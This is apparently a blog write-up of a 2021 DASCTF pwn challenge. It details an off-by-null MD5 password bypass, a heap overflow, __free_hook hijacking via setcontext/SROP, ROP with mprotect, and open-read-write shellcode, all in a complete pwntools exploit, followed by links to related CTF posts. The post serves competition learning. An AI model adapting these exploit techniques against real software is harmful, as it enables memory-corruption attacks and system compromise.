2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn datasystem

最新推荐文章于 2023-02-09 09:18:27 发布
原创 最新推荐文章于 2023-02-09 09:18:27 发布 · 435 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细讲述了如何通过MD5漏洞利用offbynull技巧绕过检查,进而进行堆溢出,并利用gB绕过密码验证。后续通过动态分配内存和精心构造payload,实现了对system调用的控制,展示了黑客在信息系统安全中的技术手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

在这里插入图片描述
开了沙箱。

在这里插入图片描述
看到两个特征数的时候显然知道是md5了,密码需要md5.

在我们输入0x20个字符的时候这里会有一个off by null。会把密码的最后要比较的mf5的第一个字节覆盖成’\x00’.
有一个off by null的漏洞。

所以导致我们如果输入的md5第一个字节可以最后是’\x00’,那么将会直接绕过检查。
所以我们就爆破一下。

import hashlib
import string
import itertools

target_c = '00'

for i in range(8):
        print(i)
        for mes in itertools.product(string.ascii_letters, repeat=i):
                if hashlib.md5((''.join(mes)).encode()).hexdigest().startswith(target_c):
                        print(''.join(mes))
                        exit()

最后发现输入gB就可以了。

进入堆部分
在这里插入图片描述add可以直接溢出。
snprintf试图写入0x500个字符,但是不允许,所以v3会直接变成0x500,就可以直接溢出。

exp

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"] 

local = 1
if local:
    r = process('./datasystem')
else:
    r = remote("node4.buuoj.cn", 25963)
    

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))

def debug():
    gdb.attach(r)
    pause()


sa("please input username: ", "admin")
sa("please input password: ", "gB" + '\x00' * 0x1e)


menu = ">> :"

def add(size, content):
    sla(menu, str(_add))
    sla("Size:", str(size))
    sa("Content:", content)

def edit(idx, content):
    sla(menu, str(_edit))
    sla("Index:", str(idx))
    sa("Content:", content)

def free(idx):
    sla(menu, str(_free))
    sla("Index:", str(idx))

def show(idx):
    sla(menu, str(_show))
    sla("Index:", str(idx))




add(0x10, 'a' * 0x10)   
add(0x430, 'a')
add(0x10, 'a')
free(1)

free(0)
add(0x10, 0x20 * 'a')  
show(0)

malloc_hook = (u64(ru('\x7f')[-6:] + '\x00\x00') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
setcontext_door = libc_base + libc.sym['setcontext'] + 53
lg("libc_base", libc_base)

free(0)
add(0x10, 0x10 * 'a' + p64(0) + p64(0x441))  

add(0x40, 'a') 
add(0x40, 'a') 
add(0x40, 'a') 

free(4)
free(3)

free(1)
add(0x40, 0x40 * 'a' + p64(0) + p64(0x51) + p64(__free_hook))    # 1


fake_rsp = free_hook & 0xfffffffffffff000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = fake_rsp
frame.rdx = 0x2000
frame.rsp = fake_rsp
frame.rip = syscall

add(0x40, 'a')  # 3
add(0x40, p64(setcontext_door))  # 4

add(len(str(frame)), str(frame)) # 5
free(5)

layout = [
libc_base+libc.search(asm("pop rdi\nret")).next(), 
free_hook & 0xfffffffffffff000,
libc_base+libc.search(asm("pop rsi\nret")).next(), 
0x2000,
libc_base+libc.search(asm("pop rdx\nret")).next(), 
7,
libc_base+libc.search(asm("pop rax\nret")).next(), 
10,
syscall,
libc_base+libc.search(asm("jmp rsp")).next(), 
]

shellcode = asm('''
    sub rsp, 0x800
    push 0x67616c66
    mov rdi, rsp
    xor esi, esi
    mov eax, 2
    syscall

    cmp eax, 0
    js failed

    mov edi, eax
    mov rsi, rsp
    mov edx, 0x100
    xor eax, eax
    syscall

    mov edx, eax
    mov rsi, rsp
    mov edi, 1
    mov eax, edi
    syscall

    jmp exit

    failed:
    push 0x6c696166
    mov edi, 1
    mov rsi, rsp
    mov edx, 4
    mov eax, edi
    syscall

    exit:
    xor edi, edi
    mov eax, 231
    syscall
    ''')

sd(flat(layout) + shellcode)

r.interactive()
DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Le1a's Blog
09-26 402
Girlfriend’s account 下载附件,得到一个excel表格,打开得到 flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21} 也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。 excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下 百度知道链
pwnDASCTF Sept 九月赛
woodwhale的博客
09-26 3798
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 536
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 301
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
DASCTF Sept X 浙江工业大学秋季挑战赛rsa1
a5555678744的博客
09-26 1113
这道题其实比较经典,最早应该是出现在2016的HCTF,出题的思路可以参照这篇博客 2016 HCTF Crypto 出题总结 #! /usr/bin/env python # -*- coding: utf-8 -*- # from flag import get_flag from hashlib import sha512 import random from Crypto.Util.number import long_to_bytes, getPrime, bytes_to_long f
DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp
Airwooh的博客
09-25 1863
排名28,还是太菜了,web就出了一道,eur1ka yyds MISC Girlfriend’s account import re import xlrd data=xlrd.open_workbook("D:\webtest\information.xls") table = data.sheets()[0] nrows = table.nrows price=table.col_values(0, start_rowx=1, end_rowx=5001) number=table.col.
DASCTF Sept X 浙江工业大学秋季挑战赛 hellounser
Tajang的大千世界
02-09 341
我傻逼,当时没做出来,赛后看wp才理解,正则也要复习复习了
[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser
cosmoslin的博客
09-28 695
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function show(){
DASCTF Sept X 浙江工业大学秋季挑战赛 web
weixin_43610673的博客
09-26 912
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function __toString(
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫(有需要的私信)
09-25 1528
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
[DASCTF-Sept-X] 双目失明,身残志坚
西电卢本伟的博客
04-28 1270
MISC、盲水印攻击
ctf简单例题
qq_64553002的博客
05-12 491
如图得到flag 打开文本编译器查找flag 得到 flag{75a3d68bf071ee188c418ea6cf0bb043}
CTF web题总结--LFI
bob的博客
08-30 8819
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 题目的url都是类似这种:http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote
CTF隐写总结!
YICONGITSME的博客
08-06 1万+
这个暑假在学安全,应对一个比赛。实验室朋友在一起学习,专攻自己的方向,相互帮助,讲解。主要是做CTF题, 我之前学过一些web的,sql注入挺让我头疼的,一次又一次的挫败。我这次先入手了隐写,学的也不是很深。下面是做的一些笔记,也是很全,也不是很好。 0x00 jpg文件头 十六进制FF D8 FF E0 cool edit 音频编辑 https://pc.qq.com/deta...
锻炼思维小题目
热门推荐
拥抱变化
03-15 2万+
第一章 假设法   一个真实的假设往往可以让事实呈现眼前,让真理浮出水面。一个人如果做什么事都可以让其思维以这些假设前提为基础,那么他便能真真正正地活在NLP里而不会陷入困境,他的人生也就会有更大地进步和提升。   初级题:   1.如何问问题?   有甲、乙两人,其中,甲只说假话,而不说真话;乙则是只说真话,不说假话。但是,他们两个人在回答别人的问题时,只通过点头与摇头来表示
CTF日常
K
01-17 627
常见MISC解题之二目前主要以BUUCTF平台的为例LSB 目前主要以BUUCTF平台的为例 通过这些题型总结一些常见的misci解题套路 LSB 这个题目,是一个LSB隐写。 下载题目,得到一张图片: 从题目的名字,大致就往LSB隐写的方向去考虑。用Stegsolve打开,发现在通道为0的时候,出现了 ...
2021DASCTF没做出来的那些题(已更新官wp版本)
kofi的博客,已停更
08-01 2217
2021DASCTF没做出来的那些题crypto签到 这两天参加了DASCTF,感觉题目质量不错,有挑战性,都是看了大概有点思路,但是实际去做又需要花点功夫的题。所以总结一下这次比赛尝试做但是没做出来的题目 crypto 签到 签到题是一个密码学的AES的题目,加密脚本给出来了 from Crypto.Cipher import AES import os def pad(a): size = (16-len(a)%16)%16 a += chr(size)*size return a iv =
【CTF大赛】2021 DASCTF July cybercms 一探再探
HBohan的博客
08-28 739
引言 在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercms 的 web 题目。 预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。 由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。 这篇就来记录一下做这道题时候的心路历程吧…… 题目初探 cybercms 赛博CMS,只为安全而生 Hint: 信息搜集是一个
2021DASCTF八月挑战赛Writeup
qq_42815161的博客
08-31 3361
文章目录 MISC 签到 寒王'sblog stealer CRYPTO easymath let's play with rsa~ ezRSA REVERSE py 看大佬们都不想写这个wp那我写一个吧Orz MISC 签到 看看公告 flag{welcome_to_dasctf_aug} 寒王'sblog 好家伙,不知道gitee是什么根本找不到。直接在url后面加上/flag.jpg访问仓库: https://hanwang2333.gitee.io/202.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值